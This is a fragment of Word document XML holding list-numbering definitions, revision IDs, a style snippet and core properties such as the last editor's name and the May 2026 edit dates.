      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="328EFFF0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="531E3830">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="68572974"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F26A63EC"/>
    <w:lvl w:ilvl="0" w:tplc="EAC29DA6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="90741CF6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="548AA192">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="E5BCE5B0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="1132EDA8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="D72C669C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="E924B3E4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="CD8E7BD6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="39A0130E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="1938828819">
    <w:abstractNumId w:val="2"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="13644769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71E"/>
    <w:rsid w:val="00116FDB"/>
    <w:rsid w:val="00744E43"/>
    <w:rsid w:val="00D8371E"/>
    <w:rsid w:val="00F1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C90B"/>
  <w15:docId w15:val="{ECF05290-B167-4FDE-9DAC-B02A522B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C0392B"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40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C0392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singh rajput</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-24T12:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-24T12:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>